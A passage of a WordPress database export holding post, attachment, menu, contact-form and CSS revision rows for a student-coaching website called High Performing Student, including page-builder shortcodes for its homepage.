08:55:50','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/slidebg5.jpg',0,'attachment','image/jpeg',0),(2003,1,'2014-07-13 08:55:54','2014-07-13 08:55:54','','slidebg2','','inherit','open','open','','slidebg2-2','','','2014-07-13 08:55:54','2014-07-13 08:55:54','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/slidebg23.jpg',0,'attachment','image/jpeg',0),(2004,1,'2014-07-14 14:38:50','2014-07-14 14:38:50','','favicon','','inherit','open','open','','favicon-2','','','2014-07-14 14:38:50','2014-07-14 14:38:50','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/favicon.png',0,'attachment','image/png',0),(2005,1,'2014-08-19 04:17:37','2014-08-19 04:17:37','','testimonials-1','','inherit','open','open','','testimonials-1-2','','','2014-08-19 04:17:37','2014-08-19 04:17:37','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/06/testimonials-1.jpg',0,'attachment','image/jpeg',0),(2006,1,'2014-09-14 23:15:47','2014-09-14 23:15:47','','rain-bg','','inherit','open','open','','rain-bg-2','','','2014-09-14 23:15:47','2014-09-14 23:15:47','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/09/rain-bg.jpg',0,'attachment','image/jpeg',0),(1040,1,'2014-09-15 17:45:51','2014-09-15 17:45:51','','About','','publish','open','open','','about-2','','','2014-09-15 17:45:51','2014-09-15 17:45:51','',0,'http://veented.com/workshops/north/north5/?p=1040',2,'nav_menu_item','',0),(1041,1,'2014-09-15 17:45:51','2014-09-15 17:45:51','','Home','','publish','open','open','','home-4','','','2014-09-15 17:45:51','2014-09-15 17:45:51','',0,'http://veented.com/workshops/north/north5/?p=1041',1,'nav_menu_item','',0),(1042,1,'2014-09-15 17:45:51','2014-09-15 17:45:51','','Works','','publish','open','open','','works-2','','','2014-09-15 17:45:51','2014-09-15 17:45:51','',0,'http://veented.com/workshops/north/north5/?p=1042',5,'nav_menu_item','',0),(1043,1,'2014-09-15 17:45:51','2014-09-15 17:45:51','','What We Do','','publish','open','open','','what-we-do-2','','','2014-09-15 17:45:51','2014-09-15 17:45:51','',0,'http://veented.com/workshops/north/north5/?p=1043',3,'nav_menu_item','',0),(1044,1,'2014-09-15 17:45:51','2014-09-15 17:45:51','','Facts','','publish','open','open','','facts-2','','','2014-09-15 17:45:51','2014-09-15 17:45:51','',0,'http://veented.com/workshops/north/north5/?p=1044',4,'nav_menu_item','',0),(1045,1,'2014-09-15 17:45:51','2014-09-15 17:45:51','','Team','','publish','open','open','','team-2','','','2014-09-15 17:45:51','2014-09-15 17:45:51','',0,'http://veented.com/workshops/north/north5/?p=1045',6,'nav_menu_item','',0),(1046,1,'2014-09-15 17:45:51','2014-09-15 17:45:51','','Features','','publish','open','open','','features-2','','','2014-09-15 17:45:51','2014-09-15 17:45:51','',0,'http://veented.com/workshops/north/north5/?p=1046',7,'nav_menu_item','',0),(2007,1,'2014-09-15 11:41:35','2014-09-15 11:41:35','Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!','Hello world!','','publish','open','open','','hello-world-2','','','2014-09-15 11:41:35','2014-09-15 11:41:35','',0,'http://veented.com/workshops/north/north5/?p=1',0,'post','',0),(1047,1,'2014-09-15 17:45:51','2014-09-15 17:45:51','','Services','','publish','open','open','','services-2','','','2014-09-15 17:45:51','2014-09-15 17:45:51','',0,'http://veented.com/workshops/north/north5/?p=1047',8,'nav_menu_item','',0),(1048,1,'2014-09-15 17:45:51','2014-09-15 17:45:51','','Contact','','publish','open','open','','contact-2','','','2014-09-15 17:45:51','2014-09-15 17:45:51','',0,'http://veented.com/workshops/north/north5/?p=1048',21,'nav_menu_item','',0),(1049,1,'2014-09-15 17:45:51','2014-09-15 17:45:51','','Extras','','publish','open','open','','extras-3','','','2014-09-15 17:45:51','2014-09-15 17:45:51','',0,'http://veented.com/workshops/north/north5/?p=1049',10,'nav_menu_item','',0),(1050,1,'2014-09-15 17:45:51','2014-09-15 17:45:51','','Home','','publish','open','open','','home-2-2','','','2014-09-15 17:45:51','2014-09-15 17:45:51','',0,'http://veented.com/workshops/north/north5/?p=1050',1,'nav_menu_item','',0),(1051,1,'2014-09-15 17:45:51','2014-09-15 17:45:51','','Prices','','publish','open','open','','prices-2','','','2014-09-15 17:45:51','2014-09-15 17:45:51','',0,'http://veented.com/workshops/north/north5/?p=1051',9,'nav_menu_item','',0),(1052,1,'2014-09-15 17:45:51','2014-09-15 17:45:51','','Fashion','','publish','open','open','','fashion','','','2014-09-15 17:45:51','2014-09-15 17:45:51','',0,'http://veented.com/workshops/north/north5/?p=1052',2,'nav_menu_item','',0),(1053,1,'2014-09-15 17:45:51','2014-09-15 17:45:51','','Naturel','','publish','open','open','','naturel','','','2014-09-15 17:45:51','2014-09-15 17:45:51','',0,'http://veented.com/workshops/north/north5/?p=1053',3,'nav_menu_item','',0),(1054,1,'2014-09-15 17:45:51','2014-09-15 17:45:51','','Blues','','publish','open','open','','blues','','','2014-09-15 17:45:51','2014-09-15 17:45:51','',0,'http://veented.com/workshops/north/north5/?p=1054',4,'nav_menu_item','',0),(1055,1,'2014-09-15 17:45:51','2014-09-15 17:45:51','','Animals','','publish','open','open','','animals','','','2014-09-15 17:45:51','2014-09-15 17:45:51','',0,'http://veented.com/workshops/north/north5/?p=1055',5,'nav_menu_item','',0),(1056,1,'2014-09-15 17:45:51','2014-09-15 17:45:51','','Contact','','publish','open','open','','contact-2-2','','','2014-09-15 17:45:51','2014-09-15 17:45:51','',0,'http://veented.com/workshops/north/north5/?p=1056',6,'nav_menu_item','',0),(2008,1,'2014-09-15 17:45:52','2014-09-15 17:45:52','','Blog Single','','publish','open','open','','blog-single-2','','','2014-09-15 17:45:52','2014-09-15 17:45:52','',0,'http://veented.com/workshops/north/north5/?p=1922',20,'nav_menu_item','',0),(2010,1,'2020-10-28 13:58:01','2020-10-28 13:58:01','','One Click Demo Import - log_file_2020-10-28__13-58-01','','inherit','open','closed','','one-click-demo-import-log_file_2020-10-28__13-58-01','','','2020-10-28 13:58:01','2020-10-28 13:58:01','',0,'http://highperformingstudent.com/wp-content/uploads/2020/10/log_file_2020-10-28__13-58-01.txt',0,'attachment','text/plain',0),(2011,1,'2020-10-28 13:58:54','2020-10-28 13:58:54','<label> Your name\n    [text* your-name] </label>\n\n<label> Your email\n    [email* your-email] </label>\n\n<label> Subject\n    [text* your-subject] </label>\n\n<label> Your message (optional)\n    [textarea your-message] </label>\n\n[submit \"Submit\"]\n[_site_title] \"[your-subject]\"\n[_site_title] <wordpress@highperformingstudent.com>\nFrom: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\n[_site_admin_email]\nReply-To: [your-email]\n\n0\n0\n\n[_site_title] \"[your-subject]\"\n[_site_title] <wordpress@highperformingstudent.com>\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\n[your-email]\nReply-To: [_site_admin_email]\n\n0\n0\nThank you for your message. It has been sent.\nThere was an error trying to send your message. Please try again later.\nOne or more fields have an error. Please check and try again.\nThere was an error trying to send your message. Please try again later.\nYou must accept the terms and conditions before sending your message.\nThe field is required.\nThe field is too long.\nThe field is too short.','Contact form 1','','publish','closed','closed','','contact-form-1','','','2020-10-28 13:58:54','2020-10-28 13:58:54','',0,'http://highperformingstudent.com/?post_type=wpcf7_contact_form&p=2011',0,'wpcf7_contact_form','',0),(2020,1,'2020-10-28 14:17:02','2020-10-28 14:17:02','.nav-inner .logo a img {\n    max-height: 70px;\n}\n\n#navigation-sticky.dark-nav {\n	background-color: #131313};\n}\n','north','','inherit','closed','closed','','39-revision-v1','','','2020-10-28 14:17:02','2020-10-28 14:17:02','',39,'http://highperformingstudent.com/2020/10/28/39-revision-v1/',0,'revision','',0),(2018,1,'2020-10-28 14:13:55','2020-10-28 14:13:55','.nav-inner .logo a img {\n    max-height: 70px;\n}\n\n#navigation-sticky.dark-nav {\n	background-color: #131313};\n}\n\n.login { \ncolor: #000000;\nborder-radius:5px;\n}\n','north','','inherit','closed','closed','','39-revision-v1','','','2020-10-28 14:13:55','2020-10-28 14:13:55','',39,'http://highperformingstudent.com/2020/10/28/39-revision-v1/',0,'revision','',0),(2022,1,'2020-10-28 14:20:41','2020-10-28 14:20:41','.nav-inner .logo a img {\n    max-height: 70px;\n}\n\n.login-now {\n	color: #ff670f;\n}\n','north','','inherit','closed','closed','','39-revision-v1','','','2020-10-28 14:20:41','2020-10-28 14:20:41','',39,'http://highperformingstudent.com/2020/10/28/39-revision-v1/',0,'revision','',0),(2025,1,'2020-10-28 14:25:51','2020-10-28 14:25:51','.nav-inner .logo a img {\n    max-height: 70px;\n}\n\n#navigation-sticky.dark-nav {\n    background-color: #131313;\n}\n\n.login-now {\n	color: #ff670f;\n}\n\n','north','','inherit','closed','closed','','39-revision-v1','','','2020-10-28 14:25:51','2020-10-28 14:25:51','',39,'http://highperformingstudent.com/2020/10/28/39-revision-v1/',0,'revision','',0),(2027,1,'2020-10-28 14:29:25','2020-10-28 14:29:25','.nav-inner .logo a img {\n    max-height: 70px;\n}\n\n#navigation-sticky.dark-nav {\n    background-color: #131313;\n}\n\n.login-now {\n	color: #ff670f;\n	border: 2px solid #ff670f;\n}\n\n','north','','inherit','closed','closed','','39-revision-v1','','','2020-10-28 14:29:25','2020-10-28 14:29:25','',39,'http://highperformingstudent.com/2020/10/28/39-revision-v1/',0,'revision','',0),(2029,1,'2020-10-28 14:36:20','2020-10-28 14:36:20','','output-onlinepngtools','','inherit','open','closed','','output-onlinepngtools','','','2020-10-28 14:37:48','2020-10-28 14:37:48','',0,'http://highperformingstudent.com/wp-content/uploads/2020/10/output-onlinepngtools.png',0,'attachment','image/png',0),(2032,1,'2020-10-28 14:41:29','2020-10-28 14:41:29','.nav-inner .logo a img {\n    max-height: 70px;\n}\n\n#navigation-sticky.dark-nav {\n    background-color: #131313;\n}\n\n.login-now {\n	color: #ff670f;\n}\n','north','','inherit','closed','closed','','39-revision-v1','','','2020-10-28 14:41:29','2020-10-28 14:41:29','',39,'http://highperformingstudent.com/2020/10/28/39-revision-v1/',0,'revision','',0),(2030,1,'2020-10-28 14:38:16','2020-10-28 14:38:16','.nav-inner .logo a img {\n    max-height: 70px;\n}\n\n#navigation-sticky.dark-nav {\n    background-color: #131313;\n}\n\n.login-now {\n	color: #ff670f;\n	background-image: url(http://highperformingstudent.com/wp-content/uploads/2020/10/output-onlinepngtools.png);\n  background-repeat: no-repeat;\n  background-position: left;\n  padding-right: 10px;\n}\n\n','north','','inherit','closed','closed','','39-revision-v1','','','2020-10-28 14:38:16','2020-10-28 14:38:16','',39,'http://highperformingstudent.com/2020/10/28/39-revision-v1/',0,'revision','',0),(2137,1,'2021-02-01 16:09:37','2021-02-01 16:09:37','[vc_row full_height=\"yes\" el_id=\"first\" content_width=\"fullwidth\" css=\".vc_custom_1612191669997{padding-top: 237px !important;padding-bottom: 237px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2021/02/Untitled-design-80-1.png?id=2142) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" fullwidth=\"yes\" row_width=\"fullwidth\"][vc_column width=\"1/6\"][/vc_column][vc_column width=\"5/6\"][vc_custom_heading text=\"Become ``Real World`` Ready\" font_container=\"tag:h1|font_size:4.5rem|text_align:left|color:%23ffffff|line_height:1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_custom_heading text=\"Your High-Performance Journey Starts Now.\" font_container=\"tag:p|font_size:1.1em|text_align:left|color:%23ffffff|line_height:1.1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:500%20bold%20regular%3A500%3Anormal\"][vc_empty_space height=\"15px\"][button label=\"Get Started Here\" target=\"_blank\" color=\"custom\" size=\"large\" customcolor=\"#e612a9\" undefined=\"\" url=\"www.samdemma.com\"][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column][vc_custom_heading text=\"You are going to die...\" font_container=\"tag:h2|font_size:4.5rem|text_align:left|color:%23333333|line_height:1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\n<p style=\"text-align: left;\"><span style=\"font-weight: 400;\">Like a food product, you have a personal “best before” date.  And before that date, there are memories you want to make, places you want to explore, people you want to meet, and an impact you want to create.  The only way to accomplish this before you expire is to reach your full potential.  <strong>Through the development of six key-traits, we help you max out your potential to live a healthy, happier and more productive life.</strong></span></p>\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2150\" img_size=\"full\" alignment=\"center\" style=\"vc_box_shadow\" onclick=\"custom_link\" img_link_target=\"_blank\" link=\"https://podcasts.apple.com/ca/podcast/high-performing-student/id1450741018\"][vc_column_text]\n<h4 style=\"text-align: center;\">The High Performing Student Podcast</h4>\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2153\" img_size=\"full\" alignment=\"center\" style=\"vc_box_shadow\" onclick=\"custom_link\" img_link_target=\"_blank\" link=\"https://www.ted.com/talks/sam_demma_small_consistent_actions\"][vc_column_text]\n<h4 style=\"text-align: center;\">The TEDx Talk</h4>\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2154\" img_size=\"full\" alignment=\"center\" style=\"vc_box_shadow\" onclick=\"custom_link\" img_link_target=\"_blank\" link=\"https://www.youtube.com/channel/UCnouAfzGsC1zvIprQbI9hGg\"][vc_column_text]\n<h4 style=\"text-align: center;\">The Youtube Channel</h4>\n[/vc_column_text][/vc_column][/vc_row]','Home1','','inherit','closed','closed','','623-autosave-v1','','','2021-02-01 16:09:37','2021-02-01 16:09:37','',623,'http://highperformingstudent.com/2021/02/01/623-autosave-v1/',0,'revision','',0),(2112,1,'2020-11-06 01:54:56','2020-11-06 01:54:56','[vc_row full_height=\"yes\" el_id=\"first\" content_width=\"fullwidth\" css=\".vc_custom_1604627459650{padding-top: 237px !important;padding-bottom: 237px !important;}\" fullwidth=\"yes\" row_width=\"fullwidth\"][vc_column][vc_custom_heading text=\"Become ``Real World`` Ready\" font_container=\"tag:h2|font_size:4.5rem|text_align:center|color:%23000000|line_height:1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_custom_heading text=\"Your High-Performance Journey Starts Now.\" font_container=\"tag:p|font_size:1.1em|text_align:center|color:%23000000|line_height:1.1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:500%20bold%20regular%3A500%3Anormal\"][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column][vc_custom_heading text=\"You are going to die...\" font_container=\"tag:h2|font_size:4.5rem|text_align:left|color:%23333333|line_height:1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: left;\"><span style=\"font-weight: 400;\">Like a food product, you have a personal “best before” date.  And before that date, there are memories you want to make, places you want to explore, people you want to meet, and an impact you want to create.  The only way to accomplish this before you expire is to reach your full potential.  <strong>Through the development of six key-skills, we help you max out your potential to live a healthy, happier and more productive life.</strong></span></p>\r\n[/vc_column_text][/vc_column][/vc_row]','Home1','','inherit','closed','closed','','623-revision-v1','','','2020-11-06 01:54:56','2020-11-06 01:54:56','',623,'http://highperformingstudent.com/2020/11/06/623-revision-v1/',0,'revision','',0),(2150,1,'2021-02-01 15:40:19','2021-02-01 15:40:19','','Untitled design (84)','','inherit','open','closed','','untitled-design-84','','','2021-02-01 15:40:19','2021-02-01 15:40:19','',623,'http://highperformingstudent.com/wp-content/uploads/2021/02/Untitled-design-84.png',0,'attachment','image/png',0),(2151,1,'2021-02-01 15:44:12','2021-02-01 15:44:12','[vc_row full_height=\"yes\" el_id=\"first\" content_width=\"fullwidth\" css=\".vc_custom_1612191669997{padding-top: 237px !important;padding-bottom: 237px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2021/02/Untitled-design-80-1.png?id=2142) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" fullwidth=\"yes\" row_width=\"fullwidth\"][vc_column width=\"1/6\"][/vc_column][vc_column width=\"5/6\"][vc_custom_heading text=\"Become ``Real World`` Ready\" font_container=\"tag:h1|font_size:4.5rem|text_align:left|color:%23ffffff|line_height:1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_custom_heading text=\"Your High-Performance Journey Starts Now.\" font_container=\"tag:p|font_size:1.1em|text_align:left|color:%23ffffff|line_height:1.1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:500%20bold%20regular%3A500%3Anormal\"][vc_empty_space height=\"15px\"][button label=\"Get Started Here\" target=\"_blank\" color=\"custom\" size=\"large\" customcolor=\"#e612a9\" undefined=\"\" url=\"www.samdemma.com\"][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column][vc_custom_heading text=\"You are going to die...\" font_container=\"tag:h2|font_size:4.5rem|text_align:left|color:%23333333|line_height:1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: left;\"><span style=\"font-weight: 400;\">Like a food product, you have a personal “best before” date.  And before that date, there are memories you want to make, places you want to explore, people you want to meet, and an impact you want to create.  The only way to accomplish this before you expire is to reach your full potential.  <strong>Through the development of six key-traits, we help you max out your potential to live a healthy, happier and more productive life.</strong></span></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2150\" img_size=\"full\" alignment=\"center\" style=\"vc_box_shadow_border\"][vc_custom_heading text=\"The High Performing Student Podcast\" font_container=\"tag:p|font_size:High%20Performing%20Student%20Podcast|text_align:center|color:%23444444\"][/vc_column][vc_column width=\"1/3\"][vc_single_image][/vc_column][vc_column width=\"1/3\"][vc_single_image][/vc_column][/vc_row]','Home1','','inherit','closed','closed','','623-revision-v1','','','2021-02-01 15:44:12','2021-02-01 15:44:12','',623,'http://highperformingstudent.com/2021/02/01/623-revision-v1/',0,'revision','',0),(2152,1,'2021-02-01 15:50:16','2021-02-01 15:50:16','','Untitled design (85)','','inherit','open','closed','','untitled-design-85','','','2021-02-01 15:50:16','2021-02-01 15:50:16','',623,'http://highperformingstudent.com/wp-content/uploads/2021/02/Untitled-design-85.png',0,'attachment','image/png',0),(2153,1,'2021-02-01 15:53:27','2021-02-01 15:53:27','','Untitled design (86)','','inherit','open','closed','','untitled-design-86','','','2021-02-01 15:53:27','2021-02-01 15:53:27','',623,'http://highperformingstudent.com/wp-content/uploads/2021/02/Untitled-design-86.png',0,'attachment','image/png',0),(2154,1,'2021-02-01 16:08:24','2021-02-01 16:08:24','','Untitled design (87)','','inherit','open','closed','','untitled-design-87','','','2021-02-01 16:08:24','2021-02-01 16:08:24','',623,'http://highperformingstudent.com/wp-content/uploads/2021/02/Untitled-design-87.png',0,'attachment','image/png',0),(2155,1,'2021-02-03 01:55:06','2021-02-03 01:55:06','[vc_row full_height=\"yes\" el_id=\"first\" content_width=\"fullwidth\" css=\".vc_custom_1612191669997{padding-top: 237px !important;padding-bottom: 237px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2021/02/Untitled-design-80-1.png?id=2142) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" fullwidth=\"yes\" row_width=\"fullwidth\"][vc_column width=\"1/6\"][/vc_column][vc_column width=\"5/6\"][vc_custom_heading text=\"Become ``Real World`` Ready\" font_container=\"tag:h1|font_size:4.5rem|text_align:left|color:%23ffffff|line_height:1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_custom_heading text=\"Your High-Performance Journey Starts Now.\" font_container=\"tag:p|font_size:1.1em|text_align:left|color:%23ffffff|line_height:1.1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:500%20bold%20regular%3A500%3Anormal\"][vc_empty_space height=\"15px\"][button label=\"Get Started Here\" target=\"_blank\" color=\"custom\" size=\"large\" customcolor=\"#e612a9\" undefined=\"\" url=\"www.samdemma.com\"][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column][vc_custom_heading text=\"You are going to die...\" font_container=\"tag:h2|font_size:4.5rem|text_align:left|color:%23333333|line_height:1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: left;\"><span style=\"font-weight: 400;\">Like a food product, you have a personal “best before” date.  And before that date, there are memories you want to make, places you want to explore, people you want to meet, and an impact you want to create.  The only way to accomplish this before you expire is to reach your full potential.  <strong>Through the development of six key-traits, we help you max out your potential to live a healthy, happier and more productive life.</strong></span></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2150\" img_size=\"full\" alignment=\"center\" style=\"vc_box_shadow\" onclick=\"custom_link\" img_link_target=\"_blank\" link=\"https://podcasts.apple.com/ca/podcast/high-performing-student/id1450741018\"][vc_column_text]\r\n<h4 style=\"text-align: center;\">The High Performing Student Podcast</h4>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2153\" img_size=\"full\" alignment=\"center\" style=\"vc_box_shadow\" onclick=\"custom_link\" img_link_target=\"_blank\" link=\"https://www.ted.com/talks/sam_demma_small_consistent_actions\"][vc_column_text]\r\n<h4 style=\"text-align: center;\">The TEDx Talk</h4>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2154\" img_size=\"full\" alignment=\"center\" style=\"vc_box_shadow\" onclick=\"custom_link\" img_link_target=\"_blank\" link=\"https://www.youtube.com/channel/UCnouAfzGsC1zvIprQbI9hGg\"][vc_column_text]\r\n<h4 style=\"text-align: center;\">The Youtube Channel</h4>\r\n[/vc_column_text][/vc_column][/vc_row]','Home1','','inherit','closed','closed','','623-revision-v1','','','2021-02-03 01:55:06','2021-02-03 01:55:06','',623,'http://highperformingstudent.com/2021/02/03/623-revision-v1/',0,'revision','',0),(2043,1,'2020-10-28 15:34:52','2020-10-28 15:34:52','','Untitled design (27)','','inherit','open','closed','','untitled-design-27-2','','','2020-10-28 15:34:52','2020-10-28 15:34:52','',623,'http://highperformingstudent.com/wp-content/uploads/2020/10/Untitled-design-27-1.png',0,'attachment','image/png',0),(2034,1,'2020-10-28 15:22:10','2020-10-28 15:22:10','','imageedit_18_8930195226','','inherit','open','closed','','imageedit_18_8930195226','','','2020-10-28 15:22:10','2020-10-28 15:22:10','',623,'http://highperformingstudent.com/wp-content/uploads/2020/10/imageedit_18_8930195226.png',0,'attachment','image/png',0),(2035,1,'2020-10-28 15:22:13','2020-10-28 15:22:13','','imageedit_13_9220096051','','inherit','open','closed','','imageedit_13_9220096051','','','2020-10-28 15:22:13','2020-10-28 15:22:13','',623,'http://highperformingstudent.com/wp-content/uploads/2020/10/imageedit_13_9220096051.png',0,'attachment','image/png',0),(2036,1,'2020-10-28 15:22:16','2020-10-28 15:22:16','','imageedit_9_7943099367','','inherit','open','closed','','imageedit_9_7943099367','','','2020-10-28 15:22:16','2020-10-28 15:22:16','',623,'http://highperformingstudent.com/wp-content/uploads/2020/10/imageedit_9_7943099367.png',0,'attachment','image/png',0),(2039,1,'2020-10-28 15:31:03','2020-10-28 15:31:03','','Untitled design (27)','','inherit','open','closed','','untitled-design-27','','','2020-10-28 15:31:03','2020-10-28 15:31:03','',623,'http://highperformingstudent.com/wp-content/uploads/2020/10/Untitled-design-27.png',0,'attachment','image/png',0),(2040,1,'2020-10-28 15:31:06','2020-10-28 15:31:06','','Untitled design (28)','','inherit','open','closed','','untitled-design-28','','','2020-10-28 15:31:06','2020-10-28 15:31:06','',623,'http://highperformingstudent.com/wp-content/uploads/2020/10/Untitled-design-28.png',0,'attachment','image/png',0),(2041,1,'2020-10-28 15:31:08','2020-10-28 15:31:08','','Untitled design (29)','','inherit','open','closed','','untitled-design-29','','','2020-10-28 15:31:08','2020-10-28 15:31:08','',623,'http://highperformingstudent.com/wp-content/uploads/2020/10/Untitled-design-29.png',0,'attachment','image/png',0),(2044,1,'2020-10-28 15:37:46','2020-10-28 15:37:46','','Untitled design (27) copy 2','','inherit','open','closed','','untitled-design-27-copy-2','','','2020-10-28 15:37:46','2020-10-28 15:37:46','',623,'http://highperformingstudent.com/wp-content/uploads/2020/10/Untitled-design-27-copy-2.png',0,'attachment','image/png',0),(2045,1,'2020-10-28 15:37:47','2020-10-28 15:37:47','','Untitled design (28) copy','','inherit','open','closed','','untitled-design-28-copy','','','2020-10-28 15:37:47','2020-10-28 15:37:47','',623,'http://highperformingstudent.com/wp-content/uploads/2020/10/Untitled-design-28-copy.png',0,'attachment','image/png',0),(2046,1,'2020-10-28 15:37:48','2020-10-28 15:37:48','','Untitled design (29) copy','','inherit','open','closed','','untitled-design-29-copy','','','2020-10-28 15:37:48','2020-10-28 15:37:48','',623,'http://highperformingstudent.com/wp-content/uploads/2020/10/Untitled-design-29-copy.png',0,'attachment','image/png',0),(2047,1,'2020-10-28 15:37:49','2020-10-28 15:37:49','','Untitled design (30)','','inherit','open','closed','','untitled-design-30','','','2020-10-28 15:37:49','2020-10-28 15:37:49','',623,'http://highperformingstudent.com/wp-content/uploads/2020/10/Untitled-design-30.png',0,'attachment','image/png',0),(2048,1,'2020-10-28 15:37:51','2020-10-28 15:37:51','','Untitled design (31)','','inherit','open','closed','','untitled-design-31','','','2020-10-28 15:37:51','2020-10-28 15:37:51','',623,'http://highperformingstudent.com/wp-content/uploads/2020/10/Untitled-design-31.png',0,'attachment','image/png',0),(2109,1,'2020-11-06 01:23:42','2020-11-06 01:23:42','[vc_row full_height=\"yes\" el_id=\"first\" content_width=\"fullwidth\" css=\".vc_custom_1603899826716{padding-top: 237px !important;padding-bottom: 237px !important;}\" fullwidth=\"yes\" row_width=\"fullwidth\"][vc_column][vc_custom_heading text=\"Become ``Real World`` Ready\" font_container=\"tag:h2|font_size:4.5rem|text_align:center|color:%23000000|line_height:1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_custom_heading text=\"Your High-Performance Journey Starts Now.\r\n\" font_container=\"tag:p|font_size:1.1em|text_align:center|color:%23000000|line_height:1.1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:500%20bold%20regular%3A500%3Anormal\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1603899245380{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #333333 !important;}\"][vc_column][logos_carousel images=\"2043,2045,2047,2046,2048\" cols=\"5\" logo_max_height=\"60\"][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column][special_heading title=\"About North\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" margin_bottom=\"65\" text_align=\"center\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" style=\"centered\" animation_delay=\"300\" text_style=\"fullwidth\" icon=\"fa-desktop\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" style=\"centered\" animation_delay=\"500\" text_style=\"fullwidth\" icon=\"fa-comments-o\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" style=\"centered\" animation_delay=\"700\" text_style=\"fullwidth\" icon=\"fa-life-ring\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" style=\"centered\" animation_delay=\"900\" text_style=\"fullwidth\" icon=\"fa-flask\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row parallax=\"yes\" 